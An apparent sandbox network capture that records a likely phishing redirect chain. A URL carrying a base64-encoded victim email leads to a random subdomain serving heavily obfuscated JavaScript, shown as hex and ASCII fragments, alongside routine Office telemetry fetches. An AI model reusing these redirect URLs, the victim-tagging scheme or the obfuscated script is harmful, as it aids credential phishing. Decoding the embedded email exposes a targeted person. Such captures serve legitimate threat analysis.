                      37192.168.2.649745191.252.162.524436472C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:40 UTC736OUTGET /yoya/sitg/YW15LmdpbHBpbkBjaGVyb2tlZWJyaWNrLmNvbQ==%E3%80%82$$$%E3%80%82 HTTP/1.1
                      Host: handlingservice.com.br
                      Connection: keep-alive
                      Upgrade-Insecure-Requests: 1
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Sec-Fetch-Site: none
                      Sec-Fetch-Mode: navigate
                      Sec-Fetch-User: ?1
                      Sec-Fetch-Dest: document
                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      sec-ch-ua-mobile: ?0
                      sec-ch-ua-platform: "Windows"
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2024-12-03 16:51:41 UTC269INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:40 GMT
                      Server: Apache
                      refresh: 0;url=https://cjcjjdkdkfkfje.gharelokhana.com/?km=YW15LmdpbHBpbkBjaGVyb2tlZWJyaWNrLmNvbQ==$$$
                      Connection: close
                      Transfer-Encoding: chunked
                      Content-Type: text/html; charset=UTF-8
                      2024-12-03 16:51:41 UTC5INData Raw: 30 0d 0a 0d 0a
                      Data Ascii: 0


                      Session IDSource IPSource PortDestination IPDestination Port
                      38192.168.2.64975613.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:42 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:42 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:42 GMT
                      Content-Type: text/xml
                      Content-Length: 415
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                      ETag: "0x8DC582B988EBD12"
                      x-ms-request-id: f440c5dc-801e-0047-7891-3f7265000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165142Z-174f7845968zgtf6hC1EWRqd8s0000000z80000000002rhf
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:51:42 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                      Session IDSource IPSource PortDestination IPDestination Port
                      39192.168.2.64975713.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:42 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:42 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:42 GMT
                      Content-Type: text/xml
                      Content-Length: 471
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                      ETag: "0x8DC582BB5815C4C"
                      x-ms-request-id: e7678828-401e-0078-7a85-434d34000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165142Z-174f7845968nxc96hC1EWRspw800000015x000000000kvm4
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:51:42 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                      Session IDSource IPSource PortDestination IPDestination Port
                      40192.168.2.64975513.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:42 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:43 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:42 GMT
                      Content-Type: text/xml
                      Content-Length: 499
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                      ETag: "0x8DC582B98CEC9F6"
                      x-ms-request-id: 98fcde7c-201e-0096-4eef-44ace6000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165142Z-174f7845968n2hr8hC1EWR9cag00000015r000000000xwcv
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:51:43 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                      Session IDSource IPSource PortDestination IPDestination Port
                      41192.168.2.64975813.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:42 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:43 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:42 GMT
                      Content-Type: text/xml
                      Content-Length: 419
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                      ETag: "0x8DC582BB32BB5CB"
                      x-ms-request-id: 2132beec-901e-00ac-46aa-42b69e000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165142Z-174f7845968frfdmhC1EWRxxbw00000016bg0000000013bv
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:51:43 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      42192.168.2.649760191.252.162.524436472C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:42 UTC671OUTGET /favicon.ico HTTP/1.1
                      Host: handlingservice.com.br
                      Connection: keep-alive
                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      sec-ch-ua-mobile: ?0
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      sec-ch-ua-platform: "Windows"
                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                      Sec-Fetch-Site: same-origin
                      Sec-Fetch-Mode: no-cors
                      Sec-Fetch-Dest: image
                      Referer: https://handlingservice.com.br/yoya/sitg/YW15LmdpbHBpbkBjaGVyb2tlZWJyaWNrLmNvbQ==%E3%80%82$$$%E3%80%82
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2024-12-03 16:51:43 UTC164INHTTP/1.1 404 Not Found
                      Date: Tue, 03 Dec 2024 16:51:43 GMT
                      Server: Apache
                      Content-Length: 315
                      Connection: close
                      Content-Type: text/html; charset=iso-8859-1
                      2024-12-03 16:51:43 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      43192.168.2.649762164.92.191.864436472C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:42 UTC785OUTGET /?km=YW15LmdpbHBpbkBjaGVyb2tlZWJyaWNrLmNvbQ==%C3%A3%C2%80%C2%82$$$%C3%A3%C2%80%C2%82 HTTP/1.1
                      Host: cjcjjdkdkfkfje.gharelokhana.com
                      Connection: keep-alive
                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      sec-ch-ua-mobile: ?0
                      sec-ch-ua-platform: "Windows"
                      Upgrade-Insecure-Requests: 1
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Sec-Fetch-Site: cross-site
                      Sec-Fetch-Mode: navigate
                      Sec-Fetch-Dest: document
                      Referer: https://handlingservice.com.br/
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2024-12-03 16:51:43 UTC181INHTTP/1.1 200 OK
                      Server: nginx
                      Date: Tue, 03 Dec 2024 16:51:43 GMT
                      Content-Type: text/html; charset=utf-8
                      Transfer-Encoding: chunked
                      Connection: close
                      Vary: Accept-Encoding
                      2024-12-03 16:51:43 UTC16203INData Raw: 37 30 38 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 66 75 6e 63 74 69 6f 6e 20 61 30 55 35 28 55 2c 4a 29 7b 76 61 72 20 54 3d 61 30 55 34 28 29 3b 72 65 74 75 72 6e 20 61 30 55 35 3d 66 75 6e 63 74 69 6f 6e 28 78 2c 75 29 7b 78 3d 78 2d 30 78 31 37 64 3b 76 61 72 20 48 3d 54 5b 78 5d 3b 72 65 74 75 72 6e 20 48 3b 7d 2c 61 30 55 35 28 55 2c 4a 29 3b 7d 28 66 75 6e 63 74 69 6f 6e 28 55 2c 4a 29 7b 76 61 72 20 78 66 3d 61 30 55 35 2c 54 3d 55 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 76 61 72 20 78 3d 2d 70 61 72 73 65 49 6e 74 28 78 66 28 30 78
                      Data Ascii: 708c<!DOCTYPE html><html lang="en"> <head> <script type="text/javascript"> function a0U5(U,J){var T=a0U4();return a0U5=function(x,u){x=x-0x17d;var H=T[x];return H;},a0U5(U,J);}(function(U,J){var xf=a0U5,T=U();while(!![]){try{var x=-parseInt(xf(0x
                      2024-12-03 16:51:43 UTC12617INData Raw: 6f 6e 28 54 44 2c 54 64 2c 54 41 2c 54 46 29 7b 76 61 72 20 75 6d 3d 75 5a 2c 54 69 3d 54 63 28 54 44 29 2c 54 68 3d 21 54 79 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 54 42 3d 7b 7d 3b 72 65 74 75 72 6e 20 54 42 5b 54 69 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 30 78 37 3b 7d 2c 30 78 37 21 3d 3d 27 27 5b 54 44 5d 28 54 42 29 3b 7d 29 2c 54 52 3d 54 68 26 26 21 54 79 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 75 4b 3d 61 30 55 35 3b 69 66 28 27 51 78 78 73 63 27 21 3d 3d 75 4b 28 30 78 32 39 65 29 29 72 65 74 75 72 6e 20 75 4b 28 30 78 35 62 37 29 21 3d 3d 55 6b 5b 75 4b 28 30 78 34 62 38 29 5d 28 7b 27 73 6f 75 72 63 65 27 3a 27 61 27 2c 27 66 6c 61 67 73 27 3a 27 62 27 7d 29 3b 65 6c 73 65 7b 76 61 72 20 54 42 3d 21 30 78
                      Data Ascii: on(TD,Td,TA,TF){var um=uZ,Ti=Tc(TD),Th=!Ty(function(){var TB={};return TB[Ti]=function(){return 0x7;},0x7!==''[TD](TB);}),TR=Th&&!Ty(function(){var uK=a0U5;if('Qxxsc'!==uK(0x29e))return uK(0x5b7)!==Uk[uK(0x4b8)]({'source':'a','flags':'b'});else{var TB=!0x
                      2024-12-03 16:51:44 UTC16384INData Raw: 37 66 66 39 0d 0a 56 28 30 78 37 30 66 29 2c 54 71 3d 54 56 28 30 78 38 66 35 29 2c 54 6c 3d 54 56 28 30 78 61 30 34 29 3b 54 6a 5b 27 65 78 70 6f 72 74 73 27 5d 3d 66 75 6e 63 74 69 6f 6e 28 54 79 2c 54 63 2c 54 6e 29 7b 76 61 72 20 48 47 3d 61 30 55 35 3b 69 66 28 27 69 70 68 64 57 27 21 3d 3d 48 47 28 30 78 34 36 30 29 29 72 65 74 75 72 6e 7b 27 76 61 6c 75 65 27 3a 55 72 2c 27 64 6f 6e 65 27 3a 55 63 7d 3b 65 6c 73 65 7b 76 61 72 20 54 4f 2c 54 4e 3b 54 71 28 54 79 29 3b 74 72 79 7b 69 66 28 21 28 54 4f 3d 54 6c 28 54 79 2c 27 72 65 74 75 72 6e 27 29 29 29 7b 69 66 28 48 47 28 30 78 34 64 34 29 3d 3d 3d 54 63 29 74 68 72 6f 77 20 54 6e 3b 72 65 74 75 72 6e 20 54 6e 3b 7d 54 4f 3d 54 4c 28 54 4f 2c 54 79 29 3b 7d 63 61 74 63 68 28 54 64 29 7b 54 4e 3d
                      Data Ascii: 7ff9V(0x70f),Tq=TV(0x8f5),Tl=TV(0xa04);Tj['exports']=function(Ty,Tc,Tn){var HG=a0U5;if('iphdW'!==HG(0x460))return{'value':Ur,'done':Uc};else{var TO,TN;Tq(Ty);try{if(!(TO=Tl(Ty,'return'))){if(HG(0x4d4)===Tc)throw Tn;return Tn;}TO=TL(TO,Ty);}catch(Td){TN=
                      2024-12-03 16:51:44 UTC16384INData Raw: 28 30 78 36 31 32 29 2c 54 6c 3d 54 56 28 30 78 31 35 37 65 29 5b 27 43 4f 4e 53 54 52 55 43 54 4f 52 27 5d 3b 54 6a 5b 76 33 28 30 78 33 33 65 29 5d 3d 54 6c 7c 7c 21 54 71 28 66 75 6e 63 74 69 6f 6e 28 54 79 29 7b 76 61 72 20 76 34 3d 76 33 3b 69 66 28 76 34 28 30 78 33 38 30 29 21 3d 3d 76 34 28 30 78 33 38 30 29 29 7b 76 61 72 20 54 6e 3d 55 6f 3b 69 66 28 55 4f 7c 7c 30 78 32 3d 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 54 6e 28 30 78 36 63 29 5d 29 7b 66 6f 72 28 76 61 72 20 54 4f 2c 54 4e 3d 30 78 30 2c 54 44 3d 55 47 5b 54 6e 28 30 78 36 63 29 5d 3b 54 4e 3c 54 44 3b 54 4e 2b 2b 29 21 54 4f 26 26 54 4e 20 69 6e 20 55 48 7c 7c 28 54 4f 7c 7c 28 54 4f 3d 55 4c 5b 54 6e 28 30 78 39 62 29 5d 5b 76 34 28 30 78 32 63 66 29 5d 5b 76 34 28 30 78 34 62 38 29 5d
                      Data Ascii: (0x612),Tl=TV(0x157e)['CONSTRUCTOR'];Tj[v3(0x33e)]=Tl||!Tq(function(Ty){var v4=v3;if(v4(0x380)!==v4(0x380)){var Tn=Uo;if(UO||0x2===arguments[Tn(0x6c)]){for(var TO,TN=0x0,TD=UG[Tn(0x6c)];TN<TD;TN++)!TO&&TN in UH||(TO||(TO=UL[Tn(0x9b)][v4(0x2cf)][v4(0x4b8)]
                      2024-12-03 16:51:44 UTC16384INData Raw: 0a 34 30 30 30 0d 0a 74 75 72 6e 20 54 6e 3f 54 63 28 74 68 69 73 2c 54 4f 2c 54 4e 29 7c 7c 30 78 30 3a 54 6c 28 74 68 69 73 2c 54 4f 2c 54 4e 29 3b 7d 7d 29 3b 7d 2c 30 78 31 33 36 32 3a 66 75 6e 63 74 69 6f 6e 28 54 6a 2c 54 61 2c 54 56 29 7b 76 61 72 20 6a 4e 3d 61 30 55 35 2c 54 4c 3d 54 56 28 30 78 31 35 64 66 29 2c 54 71 3d 54 56 28 30 78 31 62 62 37 29 2c 54 6c 3d 54 56 28 30 78 31 61 37 37 29 2c 54 79 3d 54 56 28 30 78 31 31 38 33 29 2c 54 63 3d 54 56 28 30 78 31 36 63 62 29 5b 27 66 27 5d 2c 54 6e 3d 54 56 28 30 78 31 36 31 65 29 2c 54 4f 3d 54 56 28 30 78 31 34 37 66 29 2c 54 4e 3d 54 56 28 30 78 32 35 35 35 29 2c 54 44 3d 54 56 28 30 78 31 37 65 29 2c 54 64 3d 27 41 72 72 61 79 5c 78 32 30 49 74 65 72 61 74 6f 72 27 2c 54 41 3d 54 79 5b 6a 4e
                      Data Ascii: 4000turn Tn?Tc(this,TO,TN)||0x0:Tl(this,TO,TN);}});},0x1362:function(Tj,Ta,TV){var jN=a0U5,TL=TV(0x15df),Tq=TV(0x1bb7),Tl=TV(0x1a77),Ty=TV(0x1183),Tc=TV(0x16cb)['f'],Tn=TV(0x161e),TO=TV(0x147f),TN=TV(0x2555),TD=TV(0x17e),Td='Array\x20Iterator',TA=Ty[jN
                      2024-12-03 16:51:44 UTC9INData Raw: 69 6f 6e 28 54 6a 2c 0d 0a
                      Data Ascii: ion(Tj,
                      2024-12-03 16:51:44 UTC16384INData Raw: 31 33 66 66 38 0d 0a 54 61 2c 54 56 29 7b 76 61 72 20 61 4f 3d 61 30 55 35 2c 54 4c 3d 54 56 28 30 78 37 30 66 29 2c 54 71 3d 54 56 28 30 78 31 32 39 61 29 2c 54 6c 3d 54 56 28 30 78 64 31 65 29 2c 54 79 3d 54 56 28 30 78 38 66 35 29 2c 54 63 3d 54 56 28 30 78 31 37 35 66 29 2c 54 6e 3d 54 56 28 30 78 63 66 30 29 2c 54 4f 3d 54 56 28 30 78 31 65 33 29 2c 54 4e 3d 54 56 28 30 78 31 31 34 33 29 2c 54 44 3d 54 56 28 30 78 32 30 38 34 29 2c 54 64 3d 54 56 28 30 78 31 38 37 35 29 2c 54 41 3d 54 56 28 30 78 61 30 34 29 2c 54 46 3d 54 56 28 30 78 39 37 63 29 2c 54 69 3d 54 56 28 30 78 31 64 30 62 29 2c 54 68 3d 54 56 28 30 78 32 31 31 39 29 2c 54 52 3d 54 69 5b 27 55 4e 53 55 50 50 4f 52 54 45 44 5f 59 27 5d 2c 54 6f 3d 4d 61 74 68 5b 61 4f 28 30 78 31 66 37 29
                      Data Ascii: 13ff8Ta,TV){var aO=a0U5,TL=TV(0x70f),Tq=TV(0x129a),Tl=TV(0xd1e),Ty=TV(0x8f5),Tc=TV(0x175f),Tn=TV(0xcf0),TO=TV(0x1e3),TN=TV(0x1143),TD=TV(0x2084),Td=TV(0x1875),TA=TV(0xa04),TF=TV(0x97c),Ti=TV(0x1d0b),Th=TV(0x2119),TR=Ti['UNSUPPORTED_Y'],To=Math[aO(0x1f7)
                      2024-12-03 16:51:44 UTC16384INData Raw: 29 7b 54 6a 5b 30 78 30 5d 5e 3d 54 61 5b 30 78 30 5d 2c 54 6a 5b 30 78 31 5d 5e 3d 54 61 5b 30 78 31 5d 3b 7d 76 61 72 20 55 4f 3d 5b 30 78 66 66 35 31 61 66 64 37 2c 30 78 65 64 35 35 38 63 63 64 5d 2c 55 4e 3d 5b 30 78 63 34 63 65 62 39 66 65 2c 30 78 31 61 38 35 65 63 35 33 5d 3b 66 75 6e 63 74 69 6f 6e 20 55 44 28 54 6a 29 7b 76 61 72 20 54 61 3d 5b 30 78 30 2c 54 6a 5b 30 78 30 5d 3e 3e 3e 30 78 31 5d 3b 55 6e 28 54 6a 2c 54 61 29 2c 55 6c 28 54 6a 2c 55 4f 29 2c 54 61 5b 30 78 31 5d 3d 54 6a 5b 30 78 30 5d 3e 3e 3e 30 78 31 2c 55 6e 28 54 6a 2c 54 61 29 2c 55 6c 28 54 6a 2c 55 4e 29 2c 54 61 5b 30 78 31 5d 3d 54 6a 5b 30 78 30 5d 3e 3e 3e 30 78 31 2c 55 6e 28 54 6a 2c 54 61 29 3b 7d 76 61 72 20 55 64 3d 5b 30 78 38 37 63 33 37 62 39 31 2c 30 78 31
                      Data Ascii: ){Tj[0x0]^=Ta[0x0],Tj[0x1]^=Ta[0x1];}var UO=[0xff51afd7,0xed558ccd],UN=[0xc4ceb9fe,0x1a85ec53];function UD(Tj){var Ta=[0x0,Tj[0x0]>>>0x1];Un(Tj,Ta),Ul(Tj,UO),Ta[0x1]=Tj[0x0]>>>0x1,Un(Tj,Ta),Ul(Tj,UN),Ta[0x1]=Tj[0x0]>>>0x1,Un(Tj,Ta);}var Ud=[0x87c37b91,0x1
                      2024-12-03 16:51:44 UTC16384INData Raw: 52 5b 27 73 74 79 6c 65 27 5d 3b 72 65 74 75 72 6e 20 54 6f 5b 4c 32 28 30 78 33 32 36 29 5d 3d 4c 32 28 30 78 31 62 65 29 2c 54 6f 5b 4c 32 28 30 78 32 31 30 29 5d 3d 27 30 27 2c 54 6f 5b 4c 32 28 30 78 35 32 37 29 5d 3d 27 30 27 2c 54 6f 5b 4c 32 28 30 78 33 62 35 29 5d 3d 54 68 2c 54 52 5b 27 74 65 78 74 43 6f 6e 74 65 6e 74 27 5d 3d 4c 32 28 30 78 32 62 30 29 2c 54 6c 5b 27 61 70 70 65 6e 64 43 68 69 6c 64 27 5d 28 54 52 29 2c 54 52 3b 7d 2c 54 4f 3d 66 75 6e 63 74 69 6f 6e 28 54 68 2c 54 52 29 7b 76 61 72 20 4c 33 3d 4c 31 3b 72 65 74 75 72 6e 20 54 6e 28 27 5c 78 32 37 27 5b 27 63 6f 6e 63 61 74 27 5d 28 54 68 2c 27 5c 78 32 37 2c 27 29 5b 4c 33 28 30 78 34 32 36 29 5d 28 54 52 29 29 3b 7d 2c 54 4e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 4c
                      Data Ascii: R['style'];return To[L2(0x326)]=L2(0x1be),To[L2(0x210)]='0',To[L2(0x527)]='0',To[L2(0x3b5)]=Th,TR['textContent']=L2(0x2b0),Tl['appendChild'](TR),TR;},TO=function(Th,TR){var L3=L1;return Tn('\x27'['concat'](Th,'\x27,')[L3(0x426)](TR));},TN=function(){var L
